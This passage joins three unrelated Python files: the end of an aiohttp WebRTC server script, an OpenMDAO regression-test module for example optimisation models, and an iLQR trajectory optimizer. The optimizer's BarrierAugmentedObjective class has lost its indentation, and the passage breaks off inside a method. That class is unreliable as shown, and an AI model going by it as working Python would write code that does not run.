    # at startup) because the --port option had been commented out; restore it.
    parser.add_argument(
        "--port", type=int, default=8080, help="Port for HTTP server (default: 8080)"
    )
    parser.add_argument("--verbose", "-v", action="count")
    args = parser.parse_args()

    # -v enables debug-level logging; otherwise info level.
    log_format = "%(asctime)s %(levelname)s %(message)s"
    if args.verbose:
        logging.basicConfig(format=log_format, level=logging.DEBUG)
    else:
        logging.basicConfig(format=log_format, level=logging.INFO)

    app = web.Application()
    app['websockets'] = weakref.WeakSet()   # auto-drops closed sockets
    app['meetings'] = dict()                # meeting name -> {host, participants}
    cors = aiohttp_cors.setup(app)
    app.on_shutdown.append(on_shutdown)

    static_route = app.router.add_static(
        '/static/', path=STATIC_PATH, name='static')
    app.router.add_get("/", index)
    post_route = app.router.add_post("/offer", offer)
    app.router.add_route('GET', '/ws', WebSocket)
    listener_route = app.router.add_post("/listen", listener)
    add_cors_routes([static_route, post_route, listener_route], cors)

    web.run_app(
        app, access_log=None, host=args.host, port=args.port
    )
|
""" Test the examples directory to keep them in working order.
NOTE: If you make any changes to this file, you must make the corresponding
change to the example file.
"""
import unittest
from six.moves import cStringIO
import numpy as np
from openmdao.api import Problem, Group, IndepVarComp, ExecComp, ScipyOptimizer, \
Newton, ScipyGMRES
from openmdao.test.util import assert_rel_error
from beam_tutorial import BeamTutorial
from fd_comp_example import Model as Model1
from fd_group_example import Model as Model2
from fd_model_example import Model as Model3
from implicit import SimpleImplicitComp
from implicit_ext_solve import SimpleImplicitComp as SIC2
from intersect_parabola_line import Balance, Parabola, Line
from krig_sin import TrigMM
from paraboloid_example import Paraboloid
from paraboloid_optimize_constrained import Paraboloid as ParaboloidOptCon
from paraboloid_optimize_unconstrained import Paraboloid as ParaboloidOptUnCon
from sellar_MDF_optimize import SellarDerivatives
from sellar_state_MDF_optimize import SellarStateConnection
class TestExamples(unittest.TestCase):
    """Regression tests mirroring the OpenMDAO example scripts.

    Each test rebuilds an example model, runs it, and checks the published
    reference values so the examples directory stays in working order.
    NOTE(review): expected values here are copied from the example outputs —
    if an example changes, the matching test must change with it.
    """

    def test_paraboloid_example(self):
        # Two independent inputs feeding a single Paraboloid component.
        top = Problem()
        root = top.root = Group()

        root.add('p1', IndepVarComp('x', 3.0))
        root.add('p2', IndepVarComp('y', -4.0))
        root.add('p', Paraboloid())

        root.connect('p1.x', 'p.x')
        root.connect('p2.y', 'p.y')

        top.setup(check=False)
        top.run()

        # f(3, -4) evaluates to -15 for this paraboloid.
        assert_rel_error(self, root.p.unknowns['f_xy'], -15.0, 1e-6)

    def test_paraboloid_optimize_constrained(self):
        # SLSQP minimization of the paraboloid subject to c = x - y >= 15.
        top = Problem()
        root = top.root = Group()

        root.add('p1', IndepVarComp('x', 3.0))
        root.add('p2', IndepVarComp('y', -4.0))
        root.add('p', ParaboloidOptCon())

        # Constraint Equation
        root.add('con', ExecComp('c = x-y'))

        root.connect('p1.x', 'p.x')
        root.connect('p2.y', 'p.y')
        root.connect('p.x', 'con.x')
        root.connect('p.y', 'con.y')

        top.driver = ScipyOptimizer()
        top.driver.options['optimizer'] = 'SLSQP'
        top.driver.options['disp'] = False  # keep optimizer quiet in tests

        top.driver.add_desvar('p1.x', lower=-50, upper=50)
        top.driver.add_desvar('p2.y', lower=-50, upper=50)
        top.driver.add_objective('p.f_xy')
        top.driver.add_constraint('con.c', lower=15.0)

        top.setup(check=False)
        top.run()

        assert_rel_error(self, top['p.x'], 7.166667, 1e-6)
        assert_rel_error(self, top['p.y'], -7.833333, 1e-6)

    def test_paraboloid_optimize_unconstrained(self):
        # Same minimization without the constraint; optimum moves accordingly.
        top = Problem()
        root = top.root = Group()

        root.add('p1', IndepVarComp('x', 3.0))
        root.add('p2', IndepVarComp('y', -4.0))
        root.add('p', ParaboloidOptUnCon())

        root.connect('p1.x', 'p.x')
        root.connect('p2.y', 'p.y')

        top.driver = ScipyOptimizer()
        top.driver.options['optimizer'] = 'SLSQP'
        top.driver.options['disp'] = False

        top.driver.add_desvar('p1.x', lower=-50, upper=50)
        top.driver.add_desvar('p2.y', lower=-50, upper=50)
        top.driver.add_objective('p.f_xy')

        top.setup(check=False)
        top.run()

        assert_rel_error(self, top['p.x'], 6.666667, 1e-6)
        assert_rel_error(self, top['p.y'], -7.333333, 1e-6)

    def test_beam_tutorial(self):
        # Constrained room-sizing optimization from the beam tutorial.
        top = Problem()
        top.root = BeamTutorial()

        top.driver = ScipyOptimizer()
        top.driver.options['optimizer'] = 'SLSQP'
        top.driver.options['tol'] = 1.0e-8
        top.driver.options['maxiter'] = 10000  # maximum number of solver iterations
        top.driver.options['disp'] = False

        # room length and width bounds
        top.driver.add_desvar('ivc_rlength.room_length', lower=5.0*12.0, upper=50.0*12.0)  # domain: 1in <= length <= 50ft
        top.driver.add_desvar('ivc_rwidth.room_width', lower=5.0*12.0, upper=30.0*12.0)    # domain: 1in <= width <= 30ft

        top.driver.add_objective('d_neg_area.neg_room_area')  # minimize negative area (or maximize area)

        top.driver.add_constraint('d_len_minus_wid.length_minus_width', lower=0.0)  # room_length >= room_width
        top.driver.add_constraint('d_deflection.deflection', lower=720.0)           # deflection >= 720
        top.driver.add_constraint('d_bending.bending_stress_ratio', upper=0.5)      # bending < 0.5
        top.driver.add_constraint('d_shear.shear_stress_ratio', upper=1.0/3.0)      # shear < 1/3

        top.setup(check=False)
        top.run()

        assert_rel_error(self, -top['d_neg_area.neg_room_area'], 51655.257618, .01)
        assert_rel_error(self, top['ivc_rwidth.room_width'], 227.277956, .01)
        assert_rel_error(self, top['ivc_rlength.room_length'], 227.277904, .01)
        assert_rel_error(self, top['d_deflection.deflection'], 720, .01)
        assert_rel_error(self, top['d_bending.bending_stress_ratio'], 0.148863, .001)
        assert_rel_error(self, top['d_shear.shear_stress_ratio'], 0.007985, .0001)

    def test_line_parabola_intersect(self):
        # Newton solve for both intersections of a line and a parabola,
        # starting from positive and negative initial guesses.
        from intersect_parabola_line import Line, Parabola, Balance

        top = Problem()
        root = top.root = Group()
        root.add('line', Line())
        root.add('parabola', Parabola())
        root.add('bal', Balance())

        root.connect('line.y', 'bal.y1')
        root.connect('parabola.y', 'bal.y2')
        root.connect('bal.x', 'line.x')
        root.connect('bal.x', 'parabola.x')

        root.nl_solver = Newton()
        root.ln_solver = ScipyGMRES()

        top.setup(check=False)

        stream = cStringIO()  # swallow list_states output during the test

        # Positive solution
        top['bal.x'] = 7.0
        root.list_states(stream)
        top.run()
        assert_rel_error(self, top['bal.x'], 1.430501, 1e-5)
        assert_rel_error(self, top['line.y'], 1.138998, 1e-5)

        # Negative solution
        top['bal.x'] = -7.0
        root.list_states(stream)
        top.run()
        assert_rel_error(self, top['bal.x'], -2.097168, 1e-5)
        assert_rel_error(self, top['line.y'], 8.194335, 1e-5)

    def test_sellar_MDF_optimize(self):
        # Sellar MDF formulation optimized with SLSQP.
        top = Problem()
        top.root = SellarDerivatives()

        top.driver = ScipyOptimizer()
        top.driver.options['optimizer'] = 'SLSQP'
        top.driver.options['tol'] = 1.0e-8
        top.driver.options['disp'] = False

        top.driver.add_desvar('z', lower=np.array([-10.0, 0.0]),
                              upper=np.array([10.0, 10.0]))
        top.driver.add_desvar('x', lower=0.0, upper=10.0)

        top.driver.add_objective('obj')
        top.driver.add_constraint('con1', upper=0.0)
        top.driver.add_constraint('con2', upper=0.0)

        top.setup(check=False)
        top.run()

        assert_rel_error(self, top['z'][0], 1.977639, 1e-5)
        assert_rel_error(self, top['z'][1], 0.0, 1e-5)
        assert_rel_error(self, top['x'], 0.0, 1e-5)
        assert_rel_error(self, top['obj'], 3.1833940, 1e-5)

    def test_sellar_state_connection(self):
        # Same Sellar optimum reached via the state-connection formulation.
        top = Problem()
        top.root = SellarStateConnection()

        top.driver = ScipyOptimizer()
        top.driver.options['optimizer'] = 'SLSQP'
        top.driver.options['tol'] = 1.0e-8
        top.driver.options['disp'] = False

        top.driver.add_desvar('z', lower=np.array([-10.0, 0.0]),
                              upper=np.array([10.0, 10.0]))
        top.driver.add_desvar('x', lower=0.0, upper=10.0)

        top.driver.add_objective('obj')
        top.driver.add_constraint('con1', upper=0.0)
        top.driver.add_constraint('con2', upper=0.0)

        top.setup(check=False)
        top.run()

        assert_rel_error(self, top['z'][0], 1.977639, 1e-5)
        assert_rel_error(self, top['z'][1], 0.0, 1e-5)
        assert_rel_error(self, top['x'], 0.0, 1e-5)
        assert_rel_error(self, top['obj'], 3.1833940, 1e-5)

    def test_intersect_parabola_line(self):
        # Same intersection problem as above, without the list_states calls.
        top = Problem()
        root = top.root = Group()
        root.add('line', Line())
        root.add('parabola', Parabola())
        root.add('bal', Balance())

        root.connect('line.y', 'bal.y1')
        root.connect('parabola.y', 'bal.y2')
        root.connect('bal.x', 'line.x')
        root.connect('bal.x', 'parabola.x')

        root.nl_solver = Newton()
        root.ln_solver = ScipyGMRES()

        top.setup(check=False)

        # Positive solution
        top['bal.x'] = 7.0
        top.run()
        assert_rel_error(self, top['bal.x'], 1.430501, 1e-5)
        assert_rel_error(self, top['line.y'], 1.1389998, 1e-5)

        # Negative solution
        top['bal.x'] = -7.0
        top.run()
        assert_rel_error(self, top['bal.x'], -2.097168, 1e-5)
        assert_rel_error(self, top['line.y'], 8.194335, 1e-5)

    def test_implicit(self):
        # Single implicit component solved with GMRES linear solver.
        top = Problem()
        root = top.root = Group()
        root.add('comp', SimpleImplicitComp())

        root.ln_solver = ScipyGMRES()
        top.setup(check=False)
        top.run()

        assert_rel_error(self, top['comp.z'], 2.666667, 1e-5)

    def test_implicit_ext_solve(self):
        # Implicit component converged by an external Newton solver.
        top = Problem()
        root = top.root = Group()
        root.add('p1', IndepVarComp('x', 0.5))
        root.add('comp', SimpleImplicitComp())
        root.add('comp2', ExecComp('zz = 2.0*z'))

        root.connect('p1.x', 'comp.x')
        root.connect('comp.z', 'comp2.z')

        root.ln_solver = ScipyGMRES()
        root.nl_solver = Newton()
        top.setup(check=False)
        top.run()

        assert_rel_error(self, top['comp.z'], 2.666667, 1e-5)

    def test_fd_comp_example(self):
        # Finite differencing at the component level; d(comp4.y)/d(px.x) = 81.
        top = Problem()
        top.root = Model1()

        top.setup(check=False)

        # quiet the example's per-component printing during the test run
        top.root.comp1.print_output = False
        top.root.comp2.print_output = False
        top.root.comp3.print_output = False
        top.root.comp4.print_output = False

        top.run()

        J = top.calc_gradient(['px.x'], ['comp4.y'])
        assert_rel_error(self, J[0][0], 81.0, 1e-5)

    def test_fd_group_example(self):
        # Finite differencing over a sub-group; same gradient expected.
        top = Problem()
        top.root = Model2()

        top.setup(check=False)

        top.root.comp1.print_output = False
        top.root.sub.comp2.print_output = False
        top.root.sub.comp3.print_output = False
        top.root.comp4.print_output = False

        top.run()

        J = top.calc_gradient(['px.x'], ['comp4.y'])
        assert_rel_error(self, J[0][0], 81.0, 1e-5)

    def test_fd_model_example(self):
        # Finite differencing over the full model; same gradient expected.
        top = Problem()
        top.root = Model3()

        top.setup(check=False)

        top.root.comp1.print_output = False
        top.root.comp2.print_output = False
        top.root.comp3.print_output = False
        top.root.comp4.print_output = False

        top.run()

        J = top.calc_gradient(['px.x'], ['comp4.y'])
        assert_rel_error(self, J[0][0], 81.0, 1e-5)

    def test_krig_sin(self):
        # Kriging metamodel of sin(x) with a gradient-informed distribution.
        prob = Problem()
        prob.root = TrigMM()
        prob.setup(check=False)

        # training data is just set manually. No connected input needed, since
        # we're assuming the data is pre-existing
        prob['sin_mm.train:x'] = np.linspace(0, 10, 20)
        prob['sin_mm.train:f_x:float'] = np.sin(prob['sin_mm.train:x'])
        prob['sin_mm.train:f_x:norm_dist'] = np.cos(prob['sin_mm.train:x'])

        prob['sin_mm.x'] = 2.1  # prediction happens at this value

        prob.run()

        assert_rel_error(self, prob['sin_mm.f_x:float'], 0.8632, 1e-3)
        assert_rel_error(self, prob['sin_mm.f_x:norm_dist'][0], -0.5048, 1e-3)
if __name__ == "__main__":
    # Allow running this test module directly with `python <file>`.
    unittest.main()
|
from __future__ import print_function,division
from builtins import range
from six import iteritems
from ..spaces.objective import ObjectiveFunction
from ..spaces.sets import Set
from ..spaces.controlspace import ControlSpace
from ..spaces.configurationspace import ConfigurationSpace
import math
import numpy as np
class iLQR:
    """An implementation of the iLQR trajectory optimization algorithm.

    This performs a conversion of obstacles into smooth barrier functions and
    optimizes the objective function augmented with the barrier value.
    Controls are projected onto the feasible control set at each step.

    Attributes:
        xref (array of size (T+1,n)): the optimized reference state trajectory
        uref (array of size (T,m)): the optimized reference control trajectory
        gains (pair of arrays): a pair (K,k) of arrays so that for each time step,
            the optimized control is given by
                u(x,t) ~= K[t]*(x - xref[t]) + k[t] + uref[t]
            K has dimension (T,m,n) and k has dimension (T,m)
        value (triple of T+1-lists): a triple (V,Vx,Vxx) of arrays so that for each
            time step, the quadratic expansion of the value function is given by:
                V(x,t) ~= 1/2 dx^T Vxx[t] dx + dx^T Vx[t] + V[t]
            with dx = x-xref[t].
        costGradients (array of size T,m): the gradients of total cost w.r.t.
            controls.
    """

    def __init__(self, controlSpace, objective, goalSet=None, clearanceToCostFn='square', clearanceToCostWeight=0.1):
        """Configure the optimizer.

        Args:
            controlSpace: a ControlSpace providing dynamics (nextState) and
                control sets.
            objective: the raw ObjectiveFunction to minimize.
            goalSet: terminal-constraint Set.
                NOTE(review): the default is None but the assert below requires
                a Set instance, so the default will always fail -- confirm
                whether goalSet is actually mandatory.
            clearanceToCostFn: barrier type ('square', 'inv', 'log'), or None
                to disable barrier augmentation.
            clearanceToCostWeight: initial weight on all barrier terms.
        """
        assert isinstance(objective, ObjectiveFunction)
        assert isinstance(goalSet, Set)
        self.controlSpace = controlSpace
        self.rawObjective = objective
        self.cspace = controlSpace.configurationSpace()
        self.goalSet = goalSet
        print("iLQR Objective function", objective, "augmented with", clearanceToCostFn, "barrier")
        if clearanceToCostFn is not None:
            # Wrap the raw objective so obstacle/control/goal clearances become
            # smooth barrier penalties.
            self.objective = BarrierAugmentedObjective(objective, controlSpace, self.goalSet, clearanceToCostFn, clearanceToCostWeight)
        else:
            self.objective = objective
        self.clearanceToCostWeight = clearanceToCostWeight
        self.adaptiveClearanceWeight = False
        # Outputs of run(); see class docstring for shapes.
        self.xref = None
        self.uref = None
        self.gains = None
        self.value = None
        self.costGradients = None

    def run(self, x, u, maxIters, maxInnerIters=10, xtol=1e-7, gtol=1e-7, ftol=1e-7, damping=1e-5):
        """Run iLQR starting from trajectory (x, u) (or a single start state x).

        Args:
            x: either a state trajectory of length len(u)+1 or a single start
                state (in which case the trajectory is rolled out from u).
            u: control trajectory of length T.
            maxIters: maximum outer iterations.
            maxInnerIters: inner (fixed-barrier) iterations per outer loop;
                forced to 1 when no barrier augmentation is used.
            xtol, gtol, ftol: step-size / gradient / objective tolerances.
            damping: NOTE(review): this parameter is never used -- backward()
                is called with its own default damping (1e-3); confirm intent.

        Returns:
            (converged: bool, reason: str)
        """
        if len(u) == 0:
            raise ValueError("Cannot optimize with no controls")
        if not isinstance(self.objective, BarrierAugmentedObjective):
            maxInnerIters = 1
        if not hasattr(x[0], '__iter__'):
            # assume its a single state: roll out the trajectory via dynamics
            x0 = x
            x = [x0]
            for ut in u:
                x.append(self.controlSpace.nextState(x[-1], ut))
        assert len(x) == len(u)+1
        self.xref = np.array([xt for xt in x])
        self.uref = np.array([ut for ut in u])
        T = len(u)
        m = len(u[0])
        n = len(x[0])
        # Allocate gains (K,k), value expansion (V,Vx,Vxx), and gradients.
        self.gains = (np.zeros((T, m, n)), np.zeros((T, m)))
        self.value = (np.zeros((T+1)), np.zeros((T+1, n)), np.zeros((T+1, n, n)))
        self.costGradients = np.zeros((T, m))
        if isinstance(self.objective, BarrierAugmentedObjective):
            # Shift barriers so the initial trajectory is feasible under them.
            self.objective.setBarrierFromTrajectory(self.xref, self.uref)
            feasible = self.objective.isFeasible()
            if feasible:
                print("iLQR: Starting from a feasible point with clearance for state", self.objective.barrierClearance, "control", self.objective.controlBarrierClearance, "goal", self.objective.goalBarrierClearance)
            else:
                print("iLQR: Starting from an infeasible point with clearance for state", self.objective.barrierClearance, "control", self.objective.controlBarrierClearance, "goal", self.objective.goalBarrierClearance)
        else:
            feasible = True
        # Sanity-check analytic derivatives at both ends of the trajectory;
        # pauses interactively on failure (debug aid).
        if not self.controlSpace.checkDerivatives(x[0], u[0]) or not self.controlSpace.checkDerivatives(x[-2], u[-1]):
            input("Press enter to continue >")
        if not self.objective.checkDerivatives(x[0], u[0]) or not self.objective.checkDerivatives(x[-2], u[-1]):
            input("Press enter to continue >")
        # first cost backup: value[0] holds the cost-to-go along the trajectory
        costTraj = self.value[0]
        costTraj[:] = self.evalCosts(self.xref, self.uref)
        print("INITIAL TRAJECTORY")
        for (a, b) in zip(x, u):
            print(" ", a, b)
        print(" ", x[-1])
        print("COST TRAJECTORY", costTraj)
        print("OBJECTIVE TYPE", self.objective.__class__.__name__)
        J0 = costTraj[0]
        if not math.isfinite(J0):
            raise ValueError("Need to provide a feasible path as input?")
        J0raw = self.rawObjective.cost(self.xref, self.uref)
        print("INITIAL AUGMENTED COST", J0, "TRUE COST", J0raw)
        for iter in range(maxIters):
            alpha = 1.0  # line-search step length, reset each outer iteration
            for inner in range(maxInnerIters):
                # Backward pass: compute gains and cost gradients.
                self.backward()
                g = self.costGradients
                gnorm = np.linalg.norm(g)
                if gnorm < gtol:
                    return True, 'Convergence to stationary point'
                knorm = np.linalg.norm(self.gains[1])
                print("iLQR: Norm of nominal step size: %.3f, gradient norm %.3f" % (knorm, gnorm))
                if np.dot(g.flatten(), self.gains[1].flatten()) > 0:
                    # LQR step points uphill; fall back to plain gradient descent.
                    print("WARNING: LQR step has direction reverse from gradient")
                    self.gains[1][:] = -g
                    knorm = gnorm
                # test gradient descent
                # self.gains[1][:] = -g
                # print(" Gains:",self.gains[1])
                # print(" Gradients",g)
                # Backtracking line search on the forward rollout.
                lineSearchIters = 0
                alpha0 = alpha
                while alpha*knorm > xtol and lineSearchIters < maxIters:
                    lineSearchIters += 1
                    xu = self.forward(alpha)
                    if xu is None:
                        # failure, shrink step size
                        alpha *= 0.5
                        continue
                    x, u = xu
                    # cbranch=J0 lets evalCosts bail out early once the cost
                    # already exceeds the incumbent.
                    Ja = self.evalCosts(x, u, cbranch=J0)
                    if Ja[0] < J0 and abs(Ja[0]-self.objective.cost(x, u)) > 1e-4:
                        print("Uh... difference in costs?", Ja[0], "vs", self.objective.cost(x, u))
                        input("Press enter to continue >")
                    if Ja[0] < J0:
                        # accept step
                        self.xref = x
                        self.uref = u
                        self.value[0][:] = Ja
                        print("iLQR: Step length %.3g reduced augmented cost to %.3f < %.3f" % (alpha, Ja[0], J0))
                        print("   standard cost changed from %.3f to %.3f" % (J0raw, self.rawObjective.cost(self.xref, self.uref)))
                        # print(" Endpoints",x[0],x[1])
                        # print(" Controls",u)
                        if alpha == alpha0:
                            # succeeded on first step, increase default step size
                            alpha *= 2.5
                            if alpha > 1.0:
                                alpha = 1.0
                        break
                    else:
                        # failure, shrink step size
                        # print("Rejected step to cost",Ja[0])
                        alpha *= 0.5
                # NOTE(review): Ja is referenced here even if the while loop
                # never executed; relies on the loop running at least once.
                self.value[0][:] = Ja
                J0 = Ja[0]
                J0raw = self.rawObjective.cost(self.xref, self.uref)
                if alpha*knorm <= xtol or lineSearchIters == maxIters:
                    print("iLQR: Inner iterations stalled at", lineSearchIters, "LS iters, step size", alpha, ", gradient norm", knorm, "< tolerance", xtol)
                    break
            print("iLQR: Outer iteration done, clearance for state", self.objective.barrierClearance, "control", self.objective.controlBarrierClearance, "goal", self.objective.goalBarrierClearance)
            # next outer iteration
            """
            if isinstance(self.objective,BarrierAugmentedObjective):
                self.objective.barrierWeight *= 0.5
                self.objective.controlBarrierWeight *= 0.5
                self.objective.goalBarrierWeight *= 0.5
            """
            if not isinstance(self.objective, BarrierAugmentedObjective) or max(self.objective.barrierWeight, self.objective.controlBarrierWeight, self.objective.goalBarrierWeight) < 1e-4:
                # Barrier weights negligible (or no barrier): converged on x.
                print("  COST", self.rawObjective.cost(self.xref, self.uref))
                return True, 'Convergence on x'
            else:
                if isinstance(self.objective, BarrierAugmentedObjective):
                    # Re-center barriers around the new trajectory and re-check
                    # objective convergence under the updated augmentation.
                    self.objective.updateBarrierFromTrajectory(self.xref, self.uref)
                    Ja = self.evalCosts(self.xref, self.uref)
                    if self.objective.isFeasible() and abs(Ja[0]-J0) < ftol:
                        return True, 'Convergence on f'
                    self.value[0][:] = Ja
                    J0 = Ja[0]
                    J0raw = self.rawObjective.cost(self.xref, self.uref)
                    print("AUGMENTED COST", Ja[0], "TRUE COST", J0raw, "FEASIBLE", feasible)
                    input()
        print("iLQR: final clearance for state", self.objective.barrierClearance, "control", self.objective.controlBarrierClearance, "goal", self.objective.goalBarrierClearance)
        return False, 'Max iters reached'

    def evalCosts(self, x, u, cbranch=float('inf')):
        """Returns vector of value function evaluated along trajectory.

        costs[i] is the cost-to-go from step i. If any partial sum exceeds
        `cbranch`, evaluation stops early with that bound copied to costs[0]
        (branch-and-bound style pruning for the line search).
        """
        T = len(u)
        assert T+1 == len(x)
        costs = np.empty(len(x))
        costs[-1] = self.objective.terminal(x[T])
        if costs[-1] > cbranch:
            costs[0] = costs[-1]
            return costs
        # Accumulate incremental costs backwards from the terminal state.
        for i in range(T)[::-1]:
            xt = x[i]
            ut = u[i]
            c = self.objective.incremental(xt, ut)
            costs[i] = costs[i+1] + c
            if costs[i] > cbranch:
                costs[0] = costs[i]
                return costs
        return costs

    def backward(self, damping=1e-3):
        """Computes the LQR backup centered around self.xref,self.uref.

        Will fill out self.gains, self.costGradients, and the 2nd and 3rd
        elements of self.value.

        Args:
            damping: Levenberg-Marquardt-style regularization added to the
                eigenvalues of Quu before inversion (0 disables, using pinv).
        """
        T = len(self.gains[0])
        # Initialize the value expansion at the terminal state.
        Vx = self.objective.terminal_gradient(self.xref[T])
        Vxx = self.objective.terminal_hessian(self.xref[T])
        if np.linalg.norm(Vxx-Vxx.T) > 1e-3:
            # Hessians must be symmetric; bail out loudly if not.
            print("ERROR IN TERMINAL HESSIAN", self.xref[T])
            print(Vxx)
            raise ValueError()
        self.value[1][-1] = Vx
        self.value[2][-1] = Vxx
        print("iLQR BACKWARDS PASS")
        # print("  Terminal cost",self.objective.terminal(self.xref[T]))
        # print("  Terminal grad",Vx)
        # print("  Terminal Hessian",Vxx)
        for i in range(T)[::-1]:
            # print("timestep",i)
            xt, ut = self.xref[i], self.uref[i]
            # Local linearization of dynamics and quadratic expansion of cost.
            fx, fu = self.controlSpace.nextState_jacobian(xt, ut)
            cx, cu = self.objective.incremental_gradient(xt, ut)
            cxx, cxu, cuu = self.objective.incremental_hessian(xt, ut)
            # print("  Next state jacobian x",fx)
            # print("  Next state jacobian u",fu)
            # Standard iLQR Q-function expansion.
            Qxx = fx.T.dot(Vxx.dot(fx))+cxx
            Quu = fu.T.dot(Vxx.dot(fu))+cuu
            Qxu = fx.T.dot(Vxx.dot(fu))+cxu
            Vxc = Vx
            Qx = cx + fx.T.dot(Vxc)
            Qu = cu + fu.T.dot(Vxc)
            if damping > 0:
                # Symmetrize, clamp negative eigenvalues, and damp before
                # inverting Quu so the feedback gains stay bounded.
                Quu = (Quu + Quu.T)*0.5
                Quu_evals, Quu_evecs = np.linalg.eig(Quu)
                Quu_evals[Quu_evals < 0] = 0.0
                Quu_evals += damping
                QuuInv = np.dot(Quu_evecs, np.dot(np.diag(1.0/Quu_evals), Quu_evecs.T))
            else:
                QuuInv = np.linalg.pinv(Quu)
            K = -QuuInv.dot(Qxu.T)
            k = -QuuInv.dot(Qu)
            # Back up the value expansion one step.
            temp = Qxu.dot(K)
            Vxx = Qxx + temp + temp.T + K.T.dot(Quu.dot(K))
            Vx = Qx + Qxu.dot(k) + K.T.dot(Qu+Quu.dot(k))
            # print("  Vf grad",Vx)
            # print("  Vf Hessian",Vxx)
            self.gains[0][i] = K
            self.gains[1][i] = k
            self.value[1][i] = Vx
            self.value[2][i] = Vxx
            self.costGradients[i] = Qu

    def forward(self, alpha=1.0):
        """Computes the iLQR forward pass, assuming the gain matrices have been computed.

        Rolls out the dynamics applying u = uref + alpha*(k + K*(x - xref)).
        Returns the new (x, u) trajectory pair.
        """
        x = np.empty(self.xref.shape)
        u = np.empty(self.uref.shape)
        x[0] = self.xref[0]
        u[0] = self.uref[0]
        K, k = self.gains
        for i in range(self.uref.shape[0]):
            if i == 0:
                # At the start state x[0] == xref[0], so the feedback term is 0.
                du = k[0]
            else:
                du = k[i] + K[i].dot(x[i]-self.xref[i])
            u[i] = self.uref[i] + alpha*du
            """
            if not self.controlSpace.controlSet(x[i]).contains(u[i]):
                try:
                    ui = self.controlSpace.controlSet(x[i]).project(list(u[i]))
                    if ui is None:
                        print("Projection of control failed?")
                        return None
                    u[i] = ui
                except NotImplementedError:
                    #projection may not be implemented... TODO: address control constraints some other way
                    pass
            """
            x[i+1] = self.controlSpace.nextState(x[i], u[i])
        return (x, u)
class BarrierAugmentedObjective(ObjectiveFunction):
def __init__(self,base,controlSpace,goalSet,barrierType,barrierWeight):
"""Barrier types can be 'log', 'inv', 'square'.
Barrier function depends on distance(s) to constraints.
- 'log': -log(d) if d > 0, inf otherwise
- 'inv': 1/d if d > 0, inf otherwise
- 'square': 0 if d > 0, d^2 otherwise (soft constraint)
"""
self.base = base
if isinstance(controlSpace,ControlSpace):
self.controlSpace = controlSpace
self.cspace = controlSpace.configurationSpace()
else:
assert isinstance(controlSpace,ConfigurationSpace)
self.controlSpace = None
self.cspace = controlSpace
self.goalSet = goalSet
self.barrierType = barrierType
self.barrierWeight = barrierWeight
self.barrierClearance = 0.0
self.barrierShift = 0.0
self.controlBarrierWeight = barrierWeight
self.controlBarrierClearance = 0.0
self.controlBarrierShift = 0.0
self.goalBarrierWeight = barrierWeight
self.goalBarrierClearance = 0.0
self.goalBarrierShift = 0.0
def __str__(self):
return "Barrier-augmented "+str(self.base)+" barrier "+self.barrierType
def isHard(self):
return self.barrierType in ['inv','log']
def setBarrierFromTrajectory(self,x,u,scale=1.5,mindist=1e-5,firstTime=True):
"""Evaluates the trajectory clearance and sets the barrier
offset from a trajectory, ensuring that
- If the barrier is hard, x,u is feasible under the shifted barrier
- If x,u is invalid, then the max (unweighted) barrier cost evaluated
at x,u is equal to `scale`
`mindist` is used so that if the initial point is not strictly
feasible (or is very close to the boundary) then a positive slack is given
to the constraint.
"""
dmin = None
dumin = float('inf')
for xi,ui in zip(x,u):
d = self.cspace.clearance(xi)
if dmin is None:
dmin = np.asarray(d)
else:
dmin = np.minimum(dmin,d)
if self.controlSpace is not None:
U = self.controlSpace.controlSet(xi)
dumin = min(dumin,-U.signedDistance(ui))
self.barrierClearance = dmin
if self.controlSpace is None:
self.controlBarrierClearance = 0
else:
self.controlBarrierClearance = dumin
if self.goalSet is not None:
self.goalBarrierClearance = -self.goalSet.signedDistance(x[-1])
else:
self.goalBarrierClearance = 0.0
if self.isHard():
if not firstTime:
oldBarrierShift = self.barrierShift
oldControlBarrierShift = self.controlBarrierShift
oldGoalBarrierShift = self.goalBarrierShift
self.barrierShift = np.minimum(self.barrierClearance,0.0)
self.controlBarrierShift = min(self.controlBarrierClearance,0.0)
self.goalBarrierShift = min(self.goalBarrierClearance,0.0)
if self.barrierType == 'inv':
#scale = 1/(barrierClearance - barrierShift) => barrierClearance - 1/scale = barrierShift
self.barrierShift[self.barrierClearance < mindist] -= 1.0/scale
if self.controlBarrierClearance < mindist: self.controlBarrierShift -= 1.0/scale
if self.goalBarrierClearance < mindist: self.goalBarrierShift -= 1.0/scale
elif self.barrierType == 'log':
#scale = -log(barrierClearance - barrierShift) => barrierShift = barrierClearance - exp(-scale)
print(self.barrierClearance < mindist,self.barrierClearance,mindist)
self.barrierShift[self.barrierClearance < mindist] -= math.exp(-scale)
if self.controlBarrierClearance < mindist: self.controlBarrierShift -= math.exp(-scale)
if self.goalBarrierClearance < mindist: self.goalBarrierShift -= math.exp(-scale)
else:
raise ValueError("Invalid barrier string, only log, inv, and square are supported")
if not firstTime:
self.barrierShift = np.maximum(self.barrierShift,oldBarrierShift)
self.controlBarrierShift = max(self.controlBarrierShift,oldControlBarrierShift)
self.goalBarrierShift = max(self.goalBarrierShift,oldGoalBarrierShift)
print("Barrier clearances",self.barrierClearance,self.controlBarrierClearance,self.goalBarrierClearance)
print("Barrier shifts: state",self.barrierShift,"control",self.controlBarrierShift,"goal",self.goalBarrierShift)
print(" => Cost",self.cost(x,u))
input()
else:
self.barrierShift = 0.0
self.controlBarrierShift = 0.0
self.goalBarrierShift = 0.0
def isFeasible(self):
return all(v >= 0 for v in self.barrierClearance) and self.controlBarrierClearance >= 0 and self.goalBarrierClearance >= 0
def updateBarrierFromTrajectory(self,x,u):
oldbc = self.barrierClearance
oldcbc = self.controlBarrierClearance
oldgbc = self.goalBarrierClearance
self.setBarrierFromTrajectory(x,u,firstTime=False)
print("iLQR: clearance on state",self.barrierClearance,"control",self.controlBarrierClearance,"goal",self.goalBarrierClearance)
cold = min(oldbc)
c = min(self.barrierClearance)
if c >= 0:
if cold < 0:
print("iLQR: Switched from infeasible to feasible on state constraint, clearance %.3g -> %.3g"%(cold,c))
else:
self.barrierWeight *= 0.5
print("iLQR: Stayed feasible on state constraint, sharpening constraint to %0.3g"%(self.barrierWeight,))
else:
if cold < 0:
self.barrierWeight *= 2.5
print("iLQR: Stayed infeasible on state constraint, diffusing constraint to %0.3g"%(self.barrierWeight,))
else:
print("iLQR: Switched from feasible to infeasible on state constraint, clearance %.3g -> %.3g"%(cold,c))
cold = oldcbc
c = self.controlBarrierClearance
if c >= 0:
if cold < 0:
print("iLQR: Switched from infeasible to feasible on control constraint, clearance %.3g -> %.3g"%(cold,c))
else:
